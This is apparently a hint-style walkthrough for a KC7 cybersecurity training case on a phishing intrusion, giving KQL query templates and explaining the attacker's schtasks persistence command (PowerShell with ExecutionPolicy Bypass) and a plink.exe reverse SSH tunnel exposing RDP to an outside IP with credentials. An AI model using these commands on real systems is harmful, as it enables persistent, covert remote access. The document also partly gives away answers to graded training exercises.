This post is a write-up or clues on how to resolve the KC7 investigation case of A Scandal in Valdoria - Section 3: Plenty of Phish . You can use it as a helpful guide when you encounter an obstacle, as it structured as a fill-in-the-blanks solution.

Section 3: Plenty of Phish

Question 1: What is Sonia’s job role?

Table
| where <field> <operator> "Sonia Gose"

Question 2: What email address was used to send this email?

Type the email address newspaper_jobs@gmail.com.

Question 3: When was the email sent to Sonia Gose? Enter the exact timestamp from the logs.

The sender’s email address was provided to us in question number 2. Also, we have Sonia Gose from the Employee table.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 4: What URL was included in the email?

Answer from question 3.

Question 5: What is Sonia Gose’s IP address?

Answer from question 1.

Table
| where <field> <operator> "Sonia Gose"
Table
| where <field> <operator> <Sonia Gose's IP address>
and <field> <operator> <URL> //Q4

Just the file name not the full link in the answer to question 4.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 8: What is Sonia Gose’s hostname?

Table
| where <field> <operator> "Sonia Gose"

Question 9: When did the downloaded docx file first show up on Sonia’s machine?

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 10: What was the full path of the docx file that was downloaded to Sonia’s machine?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 11: What is the sha256 hash of the file that Sonia downloaded?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 12: What is the name of the file (.ps1) that was written to disk immediately after the docx was downloaded?

Only the file name.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000) //timestamp after the event

Question 13: When was this new file created?

Timestamp from answer to question 12.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000)

Question 14: Let’s do some research! What type of file is this?

Use your Google-Fu skills!

Question 15: What does the attacker say to “let you know they are here”?

Lol! Do you see it 😄.

Question 16: According to the PowerShell script, what might be the hacker’s favorite color?

It is in the image from question 15.

Question 17: The purpose of the script is to invoke ____ and uncover da truth

It is in the image from question 15.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
| count

Question 19: What is the full command used to create the scheduled task?

From question 18. Do you see it? It is in task scheduler.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"

Question 20: What ExecutionPolicy is set in the command?

The policy will allow the script to run without restrictions.

This PowerShell command is using schtasks to create a scheduled task in Windows. Here is a breakdown of the command and what each part does:

  1. schtasks: This is a command-line tool in Windows used to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.

  2. /create: This flag tells schtasks that you want to create a new scheduled task.

  3. /sc hourly: This parameter specifies the schedule type for the task. In this case, hourly indicates that the task should run every hour.

  4. /mo 5: This modifies the schedule set by /sc. Here, it means the task will run every 5 hours.

  5. /tn "Hacktivist Manifesto": This sets the name of the task. The task will be identified in the Task Scheduler as “Hacktivist Manifesto”.

  6. /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1": This sets the action that the task will execute. Here, it runs powershell.exe with the specified parameters:

  • -ExecutionPolicy Bypass: This bypasses the PowerShell execution policy, allowing the script to run without restrictions.
  • -File C:\ProgramData\hacktivist_manifesto.ps1: This specifies the path to the PowerShell script that should be executed.

In summary, this command creates a scheduled task named “Hacktivist Manifesto” that runs a PowerShell script located at C:\ProgramData\hacktivist_manifesto.ps1 every 5 hours, bypassing any execution policy restrictions.

ProcessEvents
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "plink.exe"

The plink.exe is a command-line interface to the PuTTY back ends.

  1. plink.exe: This is the command-line interface to the PuTTY SSH client.

  2. -R 3389:localhost:3389: This sets up a reverse SSH tunnel. Here’s what each part means:

  • -R: This specifies a reverse tunnel.
  • 3389:localhost:3389: This maps port 3389 on the remote machine to port 3389 on the local machine. Port 3389 is commonly used for Remote Desktop Protocol (RDP).
  1. -ssh: This tells plink.exe to use the SSH protocol for the connection.

  2. -l $had0w: This specifies the username to log in as on the remote machine. In this case, $had0w.

  3. -pw thruthW!llS3tUfree: This specifies the password for the user $had0w.

  4. 136.130.190.181: This is the IP address of the remote machine to which you are connecting.

This command sets up a reverse SSH tunnel from the local machine to the remote machine at IP address 136.130.190.181 using the username $had0w** and the password thruthW!llS3tUfree. It maps port 3389 on the remote machine to port 3389 on the local machine. This allows you to connect to the Remote Desktop service on the local machine via the remote machine’s IP address and port 3389. Essentially, you can use this to remotely access the local machine’s desktop environment through the remote machine.

Answer from question 21.

Answer from question 21.

Question 24: What six-letter command did the attackers run to figure out which user they are logged on as on the computer?

The timestamp from answer question 21.

ProcessEvents
| where hostname == "<Sonia Gose's Hostname>"
| where timestamp >= datetime(2024-01-06 02:39:35)

Question 25: How many discovery commands did the attackers run on this machine?

Answer from question 24. Check MITRE ATT&amp;CK ID: T1018

Question 26: Do you think we can safely stop our investigation here? (yes/no)

🤔

Community Help

Join Discord to discuss the module KC7 Discord #valdoria .